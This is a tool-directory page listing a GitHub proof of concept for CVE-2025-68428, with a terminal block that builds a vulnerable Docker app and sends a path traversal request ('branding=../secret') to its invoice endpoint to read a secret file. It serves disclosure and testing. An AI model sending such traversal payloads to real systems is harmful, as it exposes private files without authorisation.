Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-68428_PoC — CVE-2025-68428 Proof of Concept | Kitploit
Tools/GitHubGitHub/12nio/cve-2025-68428_poc
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingMisconfiguration
GitHub12nio/cve-2025-68428_poc

CVE-2025-68428_PoC

CVE-2025-68428 Proof of Concept

View Repository
2467 months agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-68428_PoC

root@kitploit:~
$ git clone https://github.com/12nio/CVE-2025-68428_PoC/ && cd CVE-2025-68428_PoC
$ sudo docker build -t poc .
$ sudo docker run --rm -p 8080:8080 --name vuln poc
$ curl "http://127.0.0.1:8080/api/v1/generate-invoice?client=Dinko&branding=../secret" --output poc.pdf
3 2 4 1
  • https://github.com/advisories/GHSA-f8cm-6447-x5h2
Download Tool